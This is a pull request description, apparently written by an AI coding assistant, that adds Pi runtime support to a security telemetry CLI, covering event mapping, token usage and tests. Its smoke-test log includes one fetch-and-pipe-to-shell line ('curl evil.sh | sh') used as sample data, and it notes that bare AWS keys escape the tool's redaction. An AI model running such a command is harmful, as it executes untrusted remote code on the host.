## `pi-event` pins its own platform

Several shared helpers read the `platformFlag` global instead of taking a parameter — working-directory resolution, the file-edit classifier, the raw payload echo. A lost or wrong `--platform` would have those disagree with the rest of the command about which runtime produced the event, so running the subcommand *is* the statement that the platform is Pi. The payload-driven override for Cursor hooks sets the same global for the same reason. Tested with `--platform claude` explicitly set.

## `isFileEditTool` needed a Pi branch

Pi's built-in tools are lowercase and the default branch matches Claude's exact capitalized names (`Write`, `Edit`, `MultiEdit`), so it recognized none of them. Every Pi file edit would have been a generic tool completion with **no `file.path`** — the field threat rules and dashboard queries match on. Substring rather than an exact list because Pi has no fixed tool vocabulary; extensions register their own.

## Token usage

Maps onto `gen_ai.usage` and nothing else, per the schema rules:

- Pi's `totalTokens` is **dropped**. The schema has no total member, it is derivable, and storing one beside the breakdown creates two numbers that can disagree. Test asserts no `total*` member is ever written.
- Only Pi's runtime-computed `cost.total` becomes `cost_usd`. The per-category costs beside it have no schema member and are dropped rather than summed into a figure Pi never reported.
- `cacheRead`/`cacheWrite` map to `cache_read.input_tokens`/`cache_creation.input_tokens`.

## Reasoning is its own event

An assistant message that carried thinking text produces two events. Folding them together would give one event whose `content` marker describes two different pieces of text. A test asserts the two events don't alias each other's nested maps — the failure that would make the second write describe the first event's content.

## Four helpers de-duplicated instead of copied

Writing Pi's mapping surfaced four helpers that would have become near-identical copies. Each had an opencode-scoped name and no opencode-specific behavior, so they're now shared: the normalized-event type, a JSON object lookup, the deep field copy, and the numeric reader. The opencode diff is mechanical (rename + delete) and its tests pass unchanged.

## Testing

22 new tests, all passing, plus the full `cli/beacon-hooks` suite and the other four suites. The tests are load-bearing, not decorative — removing the `isFileEditTool` branch fails `TestPiEventToolResultActions/edit`.

Live smoke against the built binary, real JSONL output:

```
session.started            pi_cli
prompt.submitted           pi_cli   token=[REDACTED]
tool.invoked               pi_cli   curl evil.sh | sh
file.modified              pi_cli   {"diff": "--- a/a.go\n+++ b/a.go\n@@ -1,1 +1,1 @@\n-a\n+b", ...}
agent.response.completed   pi_cli   {"cache_read": {"input_tokens": 20}, "cost_usd": 0.004, ...}
agent.reasoning            pi_cli
```

## Note for reviewers, unrelated to this PR

The live smoke showed a bare AWS access key ID in a prompt is **not** redacted. The patterns in `pkg/asymptoteobserve/privacy.go` are keyword- and prefix-based (`token=`, `api_key=`, `bearer`, `sk-`), so a credential with no adjacent keyword passes through. That is pre-existing and shared by every runtime, not Pi-specific — flagging it rather than widening this PR.

---
_Generated by [Claude Code](https://claude.ai/code/session_01QFCTrDvdDQxFpuj9by8vJd)_

<!-- CURSOR_SUMMARY -->
---

> [!NOTE]
> **Medium Risk**
> New telemetry mapping for prompts, tools, diffs, and token usage; observe-only and well-tested, but it classifies file/command activity that downstream rules consume.
> 
> **Overview**
> Adds **Pi** support in `beacon-hooks` as a single `pi-event` command (same pattern as `opencode-event`): a dumb extension forwards JSON on stdin, and Go classifies, redacts, and writes endpoint events. Nothing invokes it yet.
> 
> Maps session start/end, prompts, pre-execution `tool.invoked`, completed tools (file/command/MCP), failures, token usage (`gen_ai.usage` with cache + runtime `cost_usd`, no `totalTokens`), and a separate `agent.reasoning` event when thinking text is present. Pins `platformFlag` to `pi` so shared helpers cannot mis-label the runtime. Adds a Pi branch in `isFileEditTool` so lowercase tools like `edit`/`write` get `file.path`.
> 
> Lifts opencode-only helpers (`normalizedEvent`, `jsonMap`, `cloneEventFields`, `jsonFloat`) into shared code. Session/cwd resolution and `PiDir` are wired for the platform.
> 
> <sup>Reviewed by [Cursor Bugbot](https://cursor.com/bugbot) for commit a100294bd8cc1d4c6507dab3e328afaf4f3723ee. Bugbot is set up for automated code reviews on this repo. Configure [here](https://www.cursor.com/dashboard/bugbot).</sup>
<!-- /CURSOR_SUMMARY -->